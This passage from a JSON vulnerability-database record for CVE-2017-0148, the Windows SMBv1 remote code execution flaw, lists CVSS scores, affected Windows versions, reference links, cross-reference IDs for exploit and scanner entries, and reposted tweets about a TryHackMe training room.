"NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", 
"userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 4, "enchantments": {"dependencies": {"modified": "2020-09-21T14:31:16", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", 
"PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-09-21T14:31:16", "rev": 2, "value": 9.3, "vector": "NONE"}}, "hash": "4e3af9e59f0d3602ba89af9f55f0afd0c71c41ea86fbee33039047bf3146c1bb", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "affectedConfiguration"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpeConfiguration"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "dc7888ec5bcb36228c71cf6f35f01dee", "key": "references"}, {"hash": "0751f4e56f29adf827144e01a128331d", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": 
"601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2020-09-21T14:31:16", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 50}, "differentElements": ["affectedConfiguration", "cpeConfiguration"], "edition": 4, "lastseen": "2020-09-21T14:31:16"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 1, "enchantments": {"dependencies": {"modified": "2019-05-29T18:16:45", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, 
{"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-05-29T18:16:45", "value": 9.3, "vector": "NONE"}}, "hash": "57b0cc9ed029173923d60e8e0cfc19ee6b231a39f0980bb02ec23ed90a332753", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "540a95c757910d6283d1dec5d9025be0", "key": "references"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": 
"d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "a142b7b1b3b74c6f44646072d5968b9a", "key": "description"}, {"hash": "b99edf73073813cd4c0252d2eb2a41b1", "key": "cvelist"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0148", "id": "CVE-2017-0148", "lastseen": "2019-05-29T18:16:45", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "http://www.securitytracker.com/id/1037991", "http://www.securityfocus.com/bid/96706", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0148", "type": "cve", "viewCount": 0}, "differentElements": ["references"], "edition": 1, "lastseen": "2019-05-29T18:16:45"}, {"bulletin": {"affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": 
"microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}, {"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": false}], "operator": "OR"}], "operator": "AND"}]}, "cvelist": ["CVE-2017-0148"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0146.", "edition": 6, "enchantments": {"dependencies": {"modified": "2021-02-02T06:36:30", "references": [{"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", 
"RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613"], "type": "zdt"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"], "type": "openvas"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"], "type": "thn"}, {"idList": ["SMNTC-96706"], "type": "symantec"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["MS:CVE-2017-0148"], "type": "mscve"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891"], "type": "exploitdb"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "exploitation": {"modified": "2021-02-02T06:36:30", "wildExploited": true, "wildExploitedSources": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": 
"attackerkb"}]}, "score": {"modified": "2021-02-02T06:36:30", "rev": 2, "value": 9.3, "vector": "NONE"}, "twitter": {"counter": 55, "modified": "2021-02-02T06:36:30", "tweets": [{"link": "https://twitter.com/Hobbes85ae1/status/1384683091181047808", "text": "Blue - I have just completed this room! Check it out: https://t.co/lqz4GMSKMq?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/jblanko1984/status/1382343441040936960", "text": "Blue - I have just completed this room! Check it out: https://t.co/JR1xhzqLZN?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/dwambia/status/1381683825042931712", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/6qcJuSTklT?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/Cameron16996962/status/1385269426321231876", "text": "Brute It - I have just completed this room! Check it out: https://t.co/P0vO3cuyJm?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/bruteit?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/ihoruhe/status/1381730384447213573", "text": "Blue - I have just completed this room! Check it out: https://t.co/0vHkuPlF0m?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/yellephen/status/1373222110034759681", "text": "Blue - I have just completed this room! 
Check it out: https://t.co/WbveSWg8dJ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/chittomodekinai/status/1376211737238626307", "text": "Blue - I have just completed this room! Check it out: https://t.co/ztz5xEd3UX?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/CoolHandSquid/status/1382098669852372992", "text": "Blue - I have just completed this room! Check it out: https://t.co/zCwRy6GPJf?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/_nabeen/status/1381922890770042887", "text": "\u307e\u3060writeup\u307f\u306a\u3044\u3068\u30c0\u30e1\u306d\n\nBlue - I have just completed this room! 
Check it out: https://t.co/jAlK4M1Ntn?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}, {"link": "https://twitter.com/BELKHIRIKhired1/status/1383176994536456201", "text": "Blue - I have just completed this room! Check it out: https://t.co/eoVe5ak68d?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}]}}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "96706", "refsource": "BID", "tags": [], "url": 
"http://www.securityfocus.com/bid/96706"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148", "refsource": "CONFIRM", "tags": ["Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0148"}], "hash": "55af1a6ca6e2ef71201d17b5ec2f2e4040f04ac85fbb8d337cbe70569afddce8", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "d931342d7091edb0db4db482c531ce39", "key": "cpeConfiguration"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "e758f8fa39ce9e8de2ffe527ec8b6423", "key": "affectedSoftware"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "3f9465465d68d8a7f86e1cb1f3804b2c", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "6a3356b5136599746533482cee29bc14", "key": "title"}, {"hash": 